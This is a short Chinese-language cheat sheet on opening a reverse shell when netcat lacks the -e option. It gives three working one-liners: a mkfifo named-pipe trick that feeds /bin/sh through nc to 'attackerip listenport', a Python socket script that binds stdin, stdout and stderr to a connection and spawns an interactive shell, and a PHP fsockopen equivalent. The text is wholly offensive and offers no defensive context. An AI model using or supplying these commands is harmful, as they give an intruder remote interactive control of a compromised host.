nc不支持-e时的反弹

如果你想要使用nc反弹shell，但是不能使用-e选项，你可以尝试以下的替代方法：

• 使用mkfifo或mknod命令创建一个命名管道，然后使用cat命令读取管道中的内容，并将其传递给/bin/sh执行，再将输出重定向到nc连接。 例如：

  mkfifo /tmp/f
  cat /tmp/f | /bin/sh -i 2>&1 | nc attackerip listenport > /tmp/f

• 使用python或php脚本来执行系统命令，并将标准输入、输出、错误重定向到socket连接。例如：

  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",listenport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  php -r '$sock=fsockopen("attackerip",listenport);exec("/bin/sh -i <&3 >&3 2>&3");'